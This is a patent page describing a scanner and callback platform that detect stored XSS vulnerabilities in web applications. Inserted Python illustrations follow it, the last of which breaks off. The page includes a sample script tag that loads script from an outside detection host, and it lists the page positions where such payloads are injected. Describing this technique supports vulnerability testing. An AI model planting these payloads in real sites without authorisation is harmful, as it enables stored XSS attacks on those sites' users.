CN114357457A - Vulnerability detection method and device, electronic equipment and storage medium - Google Patents

Info

Publication number
CN114357457A
Authority
CN
China
Prior art keywords
application
vulnerability
target
attack program
vulnerability detection
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN202111576762.2A
Other languages
Chinese (zh)
Inventor
谢金池
王放
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Nsfocus Technologies Inc
Nsfocus Technologies Group Co Ltd
Original Assignee
Nsfocus Technologies Inc
Nsfocus Technologies Group Co Ltd

Abstract

The application provides a vulnerability detection method, a vulnerability detection device, electronic equipment and a storage medium, which relate to the technical field of network security, and the method comprises the following steps: inputting an attack program of a target vulnerability into a target application through a vulnerability detection application, and sending the attack program to a corresponding server through the target application; the attack program comprises access address information of a vulnerability detection platform; if response content returned by the server is obtained through the vulnerability detection application, analyzing the response content, and determining a trigger page of the attack program in the target application; crawling a trigger page and executing an attack program through a vulnerability detection application to send first execution information of the attack program to a vulnerability detection platform; and receiving alarm information of the attack program returned by the vulnerability detection platform through the vulnerability detection application, and determining that the target vulnerability exists in the target application according to the alarm information. According to the technical scheme, the detection capability of the vulnerability detection application on the target vulnerability can be improved, and the detection rate of the target vulnerability is improved.

Description

Vulnerability detection method and device, electronic equipment and storage medium
Technical Field
The present application relates to the field of network security technologies, and in particular, to a vulnerability detection method and apparatus, an electronic device, and a storage medium.
Background
Web (World Wide Web) application vulnerability scanner detection technology is a very hot topic in the security industry. A Web application vulnerability scanner can detect Cross-Site Scripting (XSS) vulnerabilities.
The XSS vulnerability is the most common Web application security vulnerability. Its root cause is that the Web application does not effectively filter data input by the user, so that after an attacker embeds malicious script code into a page accessible to normal users, the embedded script is executed when a normal user accesses the page, causing a series of harms to that user, such as theft of the user's cookies, phishing, session hijacking, and the like.
XSS vulnerabilities include storage-type (stored) XSS vulnerabilities, which are serious and difficult to detect. In a storage-type XSS vulnerability, the malicious script code submitted by an attacker is stored on the Web application server, and whenever a user accesses a page containing the malicious code, its execution is triggered, so that the attack purpose is achieved.
The existing Web application vulnerability scanner has the problems of weak detection capability on a storage type XSS vulnerability and low detection rate.
Disclosure of Invention
The embodiment of the disclosure provides a vulnerability detection method, a vulnerability detection device, electronic equipment and a storage medium, which are used for improving the detection capability of a Web application vulnerability scanner on a storage type XSS vulnerability and improving the detection rate of the storage type XSS vulnerability.
In order to achieve the above purpose, the technical solution of the embodiment of the present application is implemented as follows:
in a first aspect, an embodiment of the present application provides a vulnerability detection method, including:
inputting an attack program of a target vulnerability into a target application through a vulnerability detection application, and sending the attack program to a corresponding server through the target application; the attack program comprises access address information of a vulnerability detection platform;
if response content returned by the server is obtained through the vulnerability detection application, analyzing the response content, and determining a trigger page of the attack program in the target application;
crawling the trigger page and executing the attack program through the vulnerability detection application to send first execution information of the attack program to the vulnerability detection platform;
and receiving alarm information of the attack program returned by the vulnerability detection platform through the vulnerability detection application, and determining that the target vulnerability exists in the target application according to the alarm information.
In an optional embodiment, the inputting, by the vulnerability detection application, of the attack program of the target vulnerability into the target application includes:
inputting the attack program of the target vulnerability into the content input position of the target page of the target application through the vulnerability detection application; or
inputting the attack program of the target vulnerability into the external link position in the page tag corresponding to the target page of the target application through the vulnerability detection application; or
inputting the attack program of the target vulnerability into the specified attribute position in the page tag corresponding to the target page of the target application through the vulnerability detection application.
In an optional embodiment, the parsing of the response content and determining the trigger page of the attack program in the target application includes:
parsing the response content, and determining the trigger page of the attack program in the target application according to the parsed page address information; or
parsing the response content, and determining the input page of the attack program in the target application as the trigger page according to the parsed attack program.
In an optional embodiment, the method further comprises:
if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information of the attack program returned by the vulnerability detection platform is received, determining that the target vulnerability exists in the target application;
the alarm information of the attack program is obtained when the vulnerability detection platform receives second execution information of the attack program sent by a second terminal device.
In an optional embodiment, the method further comprises:
and if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information of the attack program returned by the vulnerability detection platform is not received, determining that the target vulnerability does not exist in the target application.
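The terminal-side logic of the first aspect, as an added illustration (not the patent's own code): determining the trigger page from the server's response content by either of the two optional strategies, and the decision rule that combines response content with the platform's alarm information. The function names, the assumption that "page address information" arrives as a redirect Location, and the sample responses are all constructed here.

```python
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import urljoin


class _ResponseCollector(HTMLParser):
    """Collects the <script src=...> values found in a response body."""

    def __init__(self) -> None:
        super().__init__()
        self.script_srcs: list[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        attr = dict(attrs)
        if tag == "script" and attr.get("src"):
            self.script_srcs.append(attr["src"])


def find_trigger_page(input_page_url: str, status: int, headers: dict,
                      body: str, platform_addr: str) -> Optional[str]:
    """Determine the trigger page from the response (first aspect, optional embodiment).
    Strategy 1: page address information parsed from the response; assumed here to be
                a redirect Location after the submission.
    Strategy 2: the attack program itself parsed from the response, i.e. a <script>
                whose src points at the vulnerability detection platform; then the
                input page is the trigger page.
    Returns None when neither applies (no usable response content).
    """
    location = headers.get("Location")
    if status in (301, 302, 303) and location:
        return urljoin(input_page_url, location)            # strategy 1
    collector = _ResponseCollector()
    collector.feed(body)
    if any(src.startswith(platform_addr) for src in collector.script_srcs):
        return input_page_url                               # strategy 2
    return None


def judge(response_obtained: bool, alarm_received: bool) -> str:
    """Decision rule of the first aspect and its optional embodiments: alarm
    information from the platform means the attack program executed, so the target
    vulnerability exists (whether the scanner triggered it on the trigger page or a
    second terminal device did); no response content and no alarm means the target
    vulnerability does not exist. Response obtained but no alarm yet is left pending
    here (an assumption; the page does not state how that case is resolved).
    """
    if alarm_received:
        return "VULNERABLE"
    if not response_obtained:
        return "NOT_VULNERABLE"
    return "PENDING"


# Constructed sample data (not from the page) for a forum-style target page.
INPUT_PAGE = "http://forum.example/post/new"
PLATFORM = "http://platform.example/"
ECHO_BODY = ('<html><body><div class="post">hello</div>'
             f'<script src="{PLATFORM}?id=a1b2c3"></script></body></html>')

if __name__ == "__main__":
    print(find_trigger_page(INPUT_PAGE, 302, {"Location": "/post/42"}, "", PLATFORM))
    print(find_trigger_page(INPUT_PAGE, 200, {}, ECHO_BODY, PLATFORM))
    print(judge(response_obtained=False, alarm_received=True))
```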
In a second aspect, an embodiment of the present application provides a vulnerability detection method, which is applied to a vulnerability detection platform, and includes:
if first execution information of an attack program sent by a first terminal device through a vulnerability detection application is received, generating alarm information of the attack program; the first execution information of the attack program is sent after the first terminal device triggers the attack program of a target vulnerability in the target application through the vulnerability detection application, wherein the attack program comprises access address information of a vulnerability detection platform;
and sending the alarm information of the attack program to the vulnerability detection application of the first terminal equipment so that the vulnerability detection application determines that the target vulnerability exists in the target application.
In an optional embodiment, the attack program includes identification information, and the sending of the alarm information of the attack program to the vulnerability detection application of the terminal device based on the first execution information of the attack program includes:
acquiring the identification information of the attack program from the first execution information of the attack program;
and after the identification information is verified, sending the alarm information of the attack program to the vulnerability detection application of the terminal device.
In an optional embodiment, the method further comprises:
if second execution information of the attack program sent by a second terminal device is received, generating alarm information of the attack program; the second execution information of the attack program is sent after the second terminal device triggers the attack program in the target application.
In a third aspect, an embodiment of the present application provides a vulnerability detection apparatus, which is applied to a first terminal device, and includes:
an input module, configured to input an attack program of a target vulnerability into the target application through a vulnerability detection application and send the attack program to the corresponding server through the target application; the attack program comprises access address information of a vulnerability detection platform;
the determining module is used for analyzing the response content if the response content returned by the server is obtained through the vulnerability detection application, and determining a trigger page of the attack program in the target application;
the trigger module is used for crawling the trigger page and executing the attack program through the vulnerability detection application so as to send first execution information of the attack program to the vulnerability detection platform;
and the detection module is used for receiving the alarm information of the attack program returned by the vulnerability detection platform through the vulnerability detection application and determining that the target vulnerability exists in the target application according to the alarm information.
In an optional embodiment, the input module is further configured to:
input the attack program of the target vulnerability into the content input position of the target page of the target application through the vulnerability detection application; or
input the attack program of the target vulnerability into the external link position in the page tag corresponding to the target page of the target application through the vulnerability detection application; or
input the attack program of the target vulnerability into the specified attribute position in the page tag corresponding to the target page of the target application through the vulnerability detection application.
In an optional embodiment, the determining module is further configured to:
parse the response content, and determine the trigger page of the attack program according to the parsed page address information; or
parse the response content, and determine the input page of the attack program as the trigger page according to the parsed attack program.
In an optional embodiment, the apparatus further includes a vulnerability determining module, configured to:
if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information of the attack program returned by the vulnerability detection platform is received, determining that the target vulnerability exists in the target application;
the alarm information of the attack program is obtained when the vulnerability detection platform receives second execution information of the attack program sent by second terminal equipment.
In an optional embodiment, the apparatus further includes a non-vulnerability determination module, configured to:
and if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information of the attack program returned by the vulnerability detection platform is not received, determining that the target vulnerability does not exist in the target application.
In a fourth aspect, an embodiment of the present application provides a vulnerability detection apparatus, which is applied to a vulnerability detection platform, and includes:
a receiving module, configured to generate alarm information of an attack program if first execution information of the attack program sent by a first terminal device through a vulnerability detection application is received; the first execution information of the attack program is sent after the first terminal device triggers the attack program of a target vulnerability in the target application through the vulnerability detection application, wherein the attack program comprises access address information of a vulnerability detection platform;
and the alarm sending module is used for sending alarm information to the vulnerability detection application of the first terminal equipment so that the vulnerability detection application determines that the target vulnerability exists in the target application.
In an optional embodiment, the attack program includes identification information, and the alert sending module is further configured to:
acquiring identification information of the attack program from first execution information of the attack program;
and after the identification information is verified, sending alarm information of the attack program to the vulnerability detection application of the terminal equipment.
In an optional embodiment, the apparatus further comprises a second receiving module, configured to:
generate alarm information of the attack program if second execution information of the attack program sent by a second terminal device is received; the second execution information of the attack program is sent after the second terminal device triggers the attack program in the target application.
In a fifth aspect, an embodiment of the present application further provides an electronic device, including a memory and a processor, where the memory stores a computer program that is executable on the processor, and when the computer program is executed by the processor, the processor is enabled to implement any one of the vulnerability detection methods of the first aspect and the second aspect.
In a sixth aspect, an embodiment of the present application further provides a computer-readable storage medium, where a computer program is stored in the computer-readable storage medium, and when the computer program is executed by a processor, the method for vulnerability detection according to any of the first and second aspects is implemented.
The technical scheme provided by the embodiment of the application at least has the following beneficial effects:
inputting an attack program of a target vulnerability into a target application through a vulnerability detection application, and sending the attack program to a corresponding server through the target application; after response content returned by the server is obtained through the vulnerability detection application, a trigger page of the attack program in the target application can be analyzed from the response content; further, the vulnerability detection application crawls the trigger page and executes the attack program to send first execution information of the attack program to the vulnerability detection platform, so that the vulnerability detection platform sends alarm information of the attack program to the vulnerability detection application after determining that the attack program is successfully executed according to the first execution information of the attack program, and then determines that the target application has the target vulnerability after receiving the alarm information of the attack program returned by the vulnerability detection platform.
In this way, by specifying the access address information of the vulnerability detection platform in the attack program and inserting the attack program into the target application, when the attack program is executed in the target application, the first execution information of the attack program can be sent to the vulnerability detection platform based on the access address information, and when the vulnerability detection platform receives the first execution information of the attack program, the attack program inserted into the target application can be proved to be executed, namely, the server of the target application has the target vulnerability; the target application can be Web application, the target vulnerability can be storage type XSS vulnerability, and correspondingly, the attack program can be an attack program aiming at the storage type XSS vulnerability.
Drawings
In order to more clearly illustrate the technical solutions in the embodiments of the present application, the drawings needed to be used in the description of the embodiments will be briefly introduced below, and it is obvious that the drawings in the following description are only some embodiments of the present application, and it is obvious for those skilled in the art to obtain other drawings based on these drawings without inventive exercise.
Fig. 1 is a schematic view of an application scenario of a vulnerability detection method according to an embodiment of the present application;
fig. 2 is a flowchart of a vulnerability detection method provided in an embodiment of the present application;
fig. 3 is a flowchart of another vulnerability detection method provided in the present embodiment;
fig. 4 is a logic diagram of a vulnerability detection method according to an embodiment of the present application;
fig. 5 is a schematic structural diagram of a vulnerability detection apparatus according to an embodiment of the present application;
fig. 6 is a schematic structural diagram of another vulnerability detection apparatus provided in the embodiment of the present application;
fig. 7 is a schematic structural diagram of an electronic device according to an embodiment of the present application;
fig. 8 is a schematic structural diagram of another electronic device according to an embodiment of the present application.
Detailed Description
In order to make the objects, technical solutions and advantages of the present application clearer, the present application will be described in further detail with reference to the accompanying drawings, and it is obvious that the described embodiments are only a part of the embodiments of the present application, and not all embodiments. All other embodiments, which can be derived by a person skilled in the art from the embodiments given herein without making any creative effort, shall fall within the protection scope of the present application.
Application: an application program refers to a computer program installed on a terminal device that can complete one or more services, and generally needs to operate in cooperation with a server. The target application in the embodiments of the present disclosure may be a Web application, i.e., an application program accessed through the Web.
Storage-type XSS: in storage-type (stored) XSS, the malicious script code submitted by an attacker is stored on the Web application server side, and whenever a user accesses a page containing the malicious code, its execution is triggered, so that the attack purpose is achieved. Unlike reflected XSS, whose injected code can only be used for a single attack, the malicious script of storage-type XSS, once stored on the server, can be used many times; it is therefore also called persistent XSS.
WebKit: an open-source browser engine. It is the core part of a browser, also called the browser kernel, and is responsible for interpreting web page syntax, such as HTML (HyperText Markup Language) and JavaScript, and rendering the web page.
Web crawler: a web crawler is a program or script that scans or "crawls" web pages according to certain logic. Its workflow generally requests a set initial URL (Uniform Resource Locator) to obtain the response content, extracts the required information and further URLs from that content, and then repeats the previous work on the newly extracted URLs. The vulnerability detection application in the embodiment of the present application can use a web crawler based on the WebKit engine, so that the crawler can execute web scripts (e.g., JavaScript) and render a web page as it would be presented in the target application (e.g., a browser), and then extract the URLs in the page.
Payload (attack load): the malicious script code submitted to the Web application server may be denoted as Payload.
Blind-hit technique: when detecting whether a server has a vulnerability, the common practice is to send a specific Payload request to the server and judge from the server's response status and content whether the vulnerability exists; this is intuitive, because there is an echo. In other special scenarios the server gives no immediate indication either way (that is, whatever request is sent, the server returns the same status code and response message), so whether the vulnerability exists cannot be judged directly from the response status; the vulnerability detection application is then like a blind person, who cannot observe directly with the eyes but can judge through other senses.
For example, an attempt may be made to have a server (or browser) with the vulnerability execute a Payload that initiates a DNS (Domain Name System) query request, while monitoring at the NS (name server) of the queried domain name; if the NS server actually receives the resolution request, it can be indirectly judged that the Payload was executed, i.e., the vulnerability exists; otherwise, if no resolution request is received, the vulnerability does not exist, the network is unreachable, or the like. Besides a DNS query request, a CURL (command-line Uniform Resource Locator, a file transfer tool that works on the command line using URL syntax) request, an ICMP (Internet Control Message Protocol) request, or the like may be initiated. In short, as long as a server with the vulnerability performs some "action" that can be captured, and a server without the vulnerability does not, the existence of the vulnerability can be determined; this is the idea of the blind-hit technique.
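The platform side of the second aspect above, which is also the "captured action" of the blind-hit technique just described, as an added illustration (not the patent's own code): the platform issues identification information for an attack program, receives the access request the program makes to the platform's access address, verifies the identification information, distinguishes first execution information (from the issuing terminal's vulnerability detection application) from second execution information (from another terminal), and generates alarm information for the issuing terminal. The query parameter `id`, the HMAC-tagged identifier, the way the executing terminal is learned (passed in as a parameter), and all sample values are assumptions of this example.

```python
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import Optional
from urllib.parse import parse_qs, urlparse


@dataclass
class IssuedProgram:
    """What the platform remembers about one attack program it issued an identifier for."""
    terminal: str       # first terminal device (its vulnerability detection application)
    target: str         # target application / page the attack program was input into
    issued_at: float


class DetectionPlatform:
    """Receives the access request an executing attack program makes to the platform's
    access address and turns it into alarm information. Assumption: the identification
    information travels as the query parameter 'id' of that request."""

    def __init__(self, secret: bytes, ttl_seconds: float = 3600.0) -> None:
        self._secret = secret
        self._ttl = ttl_seconds
        self._issued: dict[str, IssuedProgram] = {}
        self.alarms: list[dict] = []

    def _tag(self, nonce: str) -> str:
        return hmac.new(self._secret, nonce.encode(), hashlib.sha256).hexdigest()[:16]

    def issue_identifier(self, terminal: str, target: str,
                         now: Optional[float] = None) -> str:
        """Identification information for a new attack program: a random nonce plus an
        HMAC tag, so a guessed or forged identifier fails verification and cannot raise
        a false alarm (the page only says the identifier is 'verified'; HMAC is this
        example's choice)."""
        nonce = secrets.token_hex(8)
        ident = f"{nonce}.{self._tag(nonce)}"
        self._issued[ident] = IssuedProgram(
            terminal, target, now if now is not None else time.time())
        return ident

    def verify_identifier(self, ident: str,
                          now: Optional[float] = None) -> Optional[IssuedProgram]:
        """Return the issued record if the tag checks out and the identifier is still
        known and not expired; otherwise None."""
        nonce, sep, tag = ident.partition(".")
        if not sep or not hmac.compare_digest(tag.encode(), self._tag(nonce).encode()):
            return None
        rec = self._issued.get(ident)
        if rec is None:
            return None
        current = now if now is not None else time.time()
        if current - rec.issued_at > self._ttl:
            return None
        return rec

    def receive_execution_info(self, request_url: str,
                               executing_terminal: Optional[str] = None,
                               now: Optional[float] = None) -> Optional[dict]:
        """Handle execution information of an attack program. If the executing terminal
        is the one that issued the program, this is 'first execution information';
        any other executor (e.g. a user of a second terminal device who opened the
        trigger page) yields 'second execution information'. Returns the alarm
        information to send to the issuing terminal's vulnerability detection
        application, or None when the identification information does not verify."""
        ident = parse_qs(urlparse(request_url).query).get("id", [None])[0]
        if ident is None:
            return None
        rec = self.verify_identifier(ident, now)
        if rec is None:
            return None
        alarm = {
            "attack_program_id": ident,
            "target": rec.target,
            "notify_terminal": rec.terminal,
            "execution_info": "first" if executing_terminal == rec.terminal else "second",
        }
        self.alarms.append(alarm)
        return alarm


if __name__ == "__main__":
    # Constructed walk-through: issue an identifier, then replay a callback for it.
    platform = DetectionPlatform(b"constructed-secret", ttl_seconds=60)
    ident = platform.issue_identifier("terminal-1", "http://forum.example/post/42", now=1000.0)
    print(platform.receive_execution_info(
        f"http://platform.example/?id={ident}", executing_terminal="terminal-1", now=1010.0))
```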
The word "exemplary" is used hereinafter to mean "serving as an example, embodiment, or illustration." Any embodiment described as "exemplary" is not necessarily to be construed as preferred or advantageous over other embodiments.
The terms "first" and "second" are used herein for descriptive purposes only and are not to be construed as indicating or implying relative importance or implicitly indicating the number of technical features indicated. Thus, a feature defined as "first" or "second" may explicitly or implicitly include one or more of that feature, and in the description of embodiments of the application, unless stated otherwise, "plurality" means two or more.
The following explains the design concept of the embodiments of the present application.
The storage-type XSS vulnerability is highly damaging and difficult to detect: the malicious script code submitted by an attacker is stored on the Web application server, and its execution is triggered whenever a user accesses a page containing the malicious code, so that the purpose of the attack is achieved. However, the existing Web application vulnerability scanner has weak detection capability for the storage-type XSS vulnerability and a low detection rate.
In view of this, the present application provides a vulnerability detection method, apparatus, electronic device, and storage medium, where access address information of a vulnerability detection platform is specified in an attack program of a storage-type XSS vulnerability, and the attack program is inserted into a Web application, when the attack program is executed in the Web application, first execution information of the attack program may be sent to the vulnerability detection platform based on the access address information, and when the vulnerability detection platform receives the first execution information of the attack program, it may be verified that the attack program inserted into the Web application is executed, that is, a server of the Web application has the storage-type XSS vulnerability; therefore, the method and the device can improve the detection capability of the Web application vulnerability detection application on the storage type XSS vulnerability and improve the detection rate of the storage type XSS vulnerability.
An application scenario of the embodiment of the present application is exemplarily described below with reference to the drawings.
As shown in fig. 1, the application scenario of the vulnerability detection method includes a plurality of terminal devices 110, a server 120, and a vulnerability detection platform 130, and in fig. 1, three terminal devices 110 are taken as an example, and the number of terminal devices 110 is not limited in practice.
The terminal device 110 includes, but is not limited to, a tablet computer, a notebook computer, a desktop computer, an intelligent appliance, and the like; the terminal device 110 may have installed therein a target application and a vulnerability detection application, for example, the target application may be a browser-type application, an information-type application, a shopping-type application, or a social-type application. The server 120 may be a background server corresponding to the target application, and the vulnerability detection platform 130 may also be a background server corresponding to the vulnerability detection application; the server 120 and the vulnerability detection platform 130 may each be implemented by a single server or multiple servers, and may also be implemented by physical servers or virtual servers.
The terminal device 110 and the server 120 may communicate with each other through a communication network, and the terminal device 110 and the vulnerability detection platform 130 may also communicate with each other through a communication network; the communication network may be a wireless network or a wired network, which is not limited in the embodiments of the present application.
In the embodiment of the application, the terminal device 110 obtains an attack program of a target vulnerability, wherein the attack program comprises access address information of a vulnerability detection platform; inputting the attack program of the target vulnerability into the target application through the vulnerability detection application, and sending the attack program to the server 120 through the target application; if response content returned by the server is obtained through the vulnerability detection application, analyzing the response content, and determining a trigger page of the attack program in the target application; crawling the trigger page and executing the attack program by the vulnerability detection application to send first execution information of the attack program to the vulnerability detection platform 130, so that the vulnerability detection platform 130 determines that the attack program is executed based on the first execution information of the attack program and sends alarm information of the attack program to the vulnerability detection application; after receiving the warning information of the attack program returned by the vulnerability detection platform through the vulnerability detection application, the terminal device 110 may determine that the target vulnerability exists in the target application.
The application scenario in fig. 1 is only an example of an application scenario for implementing the embodiment of the present application, and the embodiment of the present application is not limited to the application scenario in fig. 1, and in fact, the embodiment of the present application may be applied to any applicable scenario.
Fig. 2 is a flowchart of a vulnerability detection method according to an embodiment of the present application, where the method may be applied to a first terminal device, such as the terminal device 110 in fig. 1. As shown in fig. 2, the vulnerability detection method may include the following steps:
s201, inputting an attack program of a target vulnerability into a target application through a vulnerability detection application, and sending the attack program to a corresponding server through the target application; the attack program comprises access address information of the vulnerability detection platform.
The target application may be an application installed on the first terminal device, such as a browser application, an information application, a shopping application, or a social application, and may specifically be a Web application. The vulnerability detection application can be installed on the first terminal device and used to detect whether a security vulnerability exists in a target application on the first terminal device. The target vulnerability may be a security vulnerability to be detected, for example, a storage-type XSS vulnerability; the attack program may be malicious script code (for example, a JavaScript script) for the target vulnerability, used to attack the target application in order to determine whether the target vulnerability exists in it, and may generally be represented by a Payload; the attack program comprises the access address information of the vulnerability detection platform, so that when the attack program is executed, an access request can be sent to the vulnerability detection platform, the access request comprising the first execution information of the attack program; in addition, the attack program can also comprise identification information for uniquely identifying the attack program.
Illustratively, if the access address information of the vulnerability detection platform is http://mangdatest.com/, the attack program may be <script src=http://mangdatest.com/></script>. Because what is input into the target application is essentially the access address information of the vulnerability detection platform, the attack program is not easily intercepted by protection applications and is highly covert, so that the target vulnerability can be detected.
When detecting whether the target application has the target vulnerability, the attack program of the target vulnerability may be input into the target application, specifically, into the target page of the target application, and several optional ways of inputting the target page are described below.
In the first mode, the attack program of the target vulnerability is input into the content input position of the target page of the target application through the vulnerability detection application.
Here, the content input position of the target page can be any position that allows input, such as an input text box or a textarea text box; for example, if the target application is a forum for posting, the content input position of the target page may be the text box for entering the post content.
In the second mode, the attack program of the target vulnerability is input to the external link position in the page tag corresponding to the target page of the target application through the vulnerability detection application.
The page tag of the target page can be a script tag, and the external link position can be the src link position in the src attribute of the script tag; the src attribute specifies the URL (uniform resource locator) of an external script file, the src link points to the location of an external resource, and the content it points to is applied at the position of the current tag in the document.
In the third mode, the attack program of the target vulnerability is input into a specified attribute position in the page tag corresponding to the target page of the target application through the vulnerability detection application.
The page tag may be an HTML tag; the attribute positions in the HTML tag may be detected to determine a specified attribute position, such as the position of an on-event attribute (an event handler attribute). The execution content of the on-event may then be replaced with the attack program, or an on-event may be introduced dynamically and the attack program loaded through that on-event.
It should be noted that the attack programs input at different positions of the target page may have different identification information to distinguish the attack programs at different positions.
S202, if response content returned by the server is obtained through the vulnerability detection application, the response content is analyzed, and a trigger page of the attack program in the target application is determined.
In the embodiment of the application, the vulnerability detection application can analyze the response content returned by the server based on a scanning engine, which can be a scanning engine with a Webkit kernel, and can capture content such as page address information and the attack program from the response content, where the page address information can be the address information of the trigger page of the attack program. In addition, if the attack program is included in the response content but page address information is not, it can be determined that the trigger page of the attack program is the page where the attack program was input.
Therefore, in some embodiments, analyzing the response content in S202 to determine the trigger page of the attack program in the target application may cover the following two cases:
In the first case, analyzing the response content yields both page address information and the content of the attack program, and the trigger page of the attack program in the target application is determined according to the analyzed page address information.
For example, after the attack program is input into the target page of the target application, the server of the target application publishes the attack program in the trigger page, so the attack program needs to be executed in the trigger page.
In the second case, analyzing the response content yields the content of the attack program, and the input page of the attack program in the target application is determined as the trigger page according to the analyzed content of the attack program.
For example, after the attack program is input into the target page of the target application, the server of the target application publishes the attack program in the target page itself, so the attack program may be executed in the target page.
S203, crawling the trigger page and executing the attack program through the vulnerability detection application so as to send first execution information of the attack program to the vulnerability detection platform.
In this step, the Webkit scanning engine of the vulnerability detection application may act as a web crawler, crawl the trigger page, and trigger the attack program. Because the attack program includes the access address information of the vulnerability detection platform, once triggered it may send an access request to the vulnerability detection platform, where the access request includes first execution information of the attack program, for example: the content of the attack program, the address information of the page on which the attack program was executed, and the like.
After receiving the first execution information of the attack program, the vulnerability detection platform can determine that the attack program is successfully executed, acquire the executed page address information of the attack program, and further send the alarm information of the attack program and the executed page address information of the attack program to the vulnerability detection application. In addition, the vulnerability detection platform can also check the identification information of the attack program so as to determine the position of inputting the attack program into the target page of the target application.
S204, receiving alarm information of the attack program returned by the vulnerability detection platform through the vulnerability detection application, and determining that the target vulnerability exists in the target application according to the alarm information.
Specifically, the alarm information of the attack program indicates that the attack program was successfully executed. The vulnerability detection application can determine, according to the alarm information, that the target application has the target vulnerability, specifically that the target vulnerability exists at the position of the target page of the target application where the attack program was input, and a detection report of the target vulnerability can be generated.
In the method and device of the application, the attack program of the target vulnerability is input into the target application using a blind typing (blind XSS) technique, so that the target application submits the attack program to the server. If the vulnerability detection application obtains the response content of the server, the trigger page of the attack program can be determined from the response content; the vulnerability detection application can then crawl the trigger page and execute the attack program, which sends an access request to the vulnerability detection platform (which can be understood as a blind typing platform), so that the platform determines that the attack program was successfully executed and the target application is determined to have the target vulnerability.
Considering that the input page and the trigger page of the attack program of the target vulnerability may not be the same page, that there may be multiple trigger pages, and that different trigger pages may filter the output content differently, if it is determined only on the input page whether the response content of the server to the attack program was received, detections may be missed. In addition, the triggering of an attack program may depend on the authority of an administrator or other privileged user. For example: a website has a message board function, and a message posted by a user must be reviewed by an administrator; if the message input position has the target vulnerability and the attack program is input there, then after the message is successfully posted, only an administrator with message review authority can trigger the attack program. If the user side only judges whether the response content of the server to the attack program was received, the detection will be missed.
In order to avoid the missed detection caused by the above situation, on one hand, in the embodiment of the present application, after the attack program is submitted to the server of the target application, if the response content returned by the server is obtained and the trigger page of the attack program is analyzed, the vulnerability detection application crawls the trigger page and executes the attack program to send an access request to the vulnerability detection platform, so that the vulnerability detection platform determines that the attack program is successfully executed, and further determines that the target application has the target vulnerability.
On the other hand, considering that the attack program may need to be triggered in the target application on the second terminal device, the embodiment of the present application may monitor the execution condition of the attack program through the vulnerability detection application. Optionally, the embodiment of the present application may further include the following steps:
if the response content returned by the server is not obtained through the vulnerability detection application but the alarm information of the attack program returned by the vulnerability detection platform is received, determining that the target vulnerability exists in the target application;
where the alarm information of the attack program is generated when the vulnerability detection platform receives second execution information of the attack program sent by a second terminal device.
The server can release the attack program to the target application after the user inputs the attack program into the target application on the first terminal device, and other users can trigger the attack program through the target application on the second terminal device; the other users may be administrators of the target application, for example, to review content published in the target application, or may be ordinary users, which may publish content in the target application or browse content, and the like.
Based on the above embodiments of the present application, after submitting an attack program to a server of a target application, if response content returned by the server is obtained through a vulnerability detection application, and after triggering the attack program, a vulnerability detection platform returns alarm information of the attack program, so that it can be determined that the target application has a target vulnerability; on the contrary, if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information returned by the vulnerability detection platform is not received, it can be shown that the attack program is intercepted and the target application does not have the target vulnerability.
Therefore, in some embodiments, the present application embodiments may further include the steps of:
and if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information of the attack program returned by the vulnerability detection platform is not received, determining that the target vulnerability does not exist in the target application.
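The scanner-side flow of S201 to S204 and the two additional cases above, as an added illustration in Python that is not part of the patent or of any NSFOCUS product: a payload carrying a unique id and the platform address, the trigger-page decision from the server's response, a stand-in for the Webkit trigger, and the final verdict. The platform host, the random id, the use of a Location header or href links as page address information, and the handling of a response with no alarm are assumptions of this example.

```python
import re
import secrets
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import urljoin

# Constructed placeholder for the blind typing platform address. The patent's
# own illustration is http://mangdatest.com/; a deployment uses its own host.
PLATFORM_URL = "http://platform.example/"


def new_payload_id() -> str:
    """Identification information that uniquely identifies one attack program.
    Assumption: a random token, so a callback cannot be forged by guessing the
    id (the patent only requires the id to be unique per input position)."""
    return secrets.token_hex(8)


def build_payload(payload_id: str, platform_url: str = PLATFORM_URL) -> str:
    """S201: the attack program is only a script tag whose src is the platform
    address; the id rides in the URL path so the platform can map a callback
    back to the input position that produced it."""
    return f'<script src="{platform_url}{payload_id}"></script>'


@dataclass
class Response:
    """Response content returned by the target application's server."""
    body: str
    headers: dict = field(default_factory=dict)


HREF_RE = re.compile(r'href="([^"]+)"')


def determine_trigger_pages(resp: Optional[Response], payload: str, input_page: str) -> list:
    """S202: which pages must be crawled to trigger the attack program.
    Case 1: the response carries the attack program and page address
            information (assumed here: a Location header or href links).
    Case 2: the response carries the attack program but no page address,
            so the input page itself is the trigger page.
    Otherwise (no response, or the program was stripped or HTML-escaped, which
    is what a fixed application does): nothing to crawl; wait for a passive
    trigger on another terminal instead."""
    if resp is None or payload not in resp.body:
        return []
    pages = []
    if "Location" in resp.headers:
        pages.append(urljoin(input_page, resp.headers["Location"]))
    pages += [urljoin(input_page, h) for h in HREF_RE.findall(resp.body)]
    return list(dict.fromkeys(pages)) or [input_page]


def simulate_webkit_trigger(page_url: str, page_html: str,
                            platform_url: str = PLATFORM_URL) -> list:
    """S203 stand-in for the Webkit engine. A real engine loads the page and
    the script src fetch reaches the platform; here we only compute what that
    fetch carries, the first execution information: payload id + page address."""
    callbacks = []
    for src in re.findall(r'<script src="([^"]+)"', page_html):
        if src.startswith(platform_url):
            callbacks.append({"payload_id": src[len(platform_url):], "page": page_url})
    return callbacks


def verdict(got_response: bool, alarm_received: bool) -> str:
    """S204 plus the two additional cases: an alarm from the platform (active
    trigger by the scanner or passive trigger on a second terminal) proves the
    stored XSS; no response and no alarm means the program was intercepted.
    A response without an alarm is left open by the patent; treated here
    (an assumption) as still monitoring, since passive triggers take time."""
    if alarm_received:
        return "vulnerable"
    if not got_response:
        return "not vulnerable"
    return "monitoring"


if __name__ == "__main__":
    # Constructed walk-through: a forum post whose server answers with a
    # redirect to the new post, where the stored script is rendered unescaped.
    pid = new_payload_id()
    payload = build_payload(pid)
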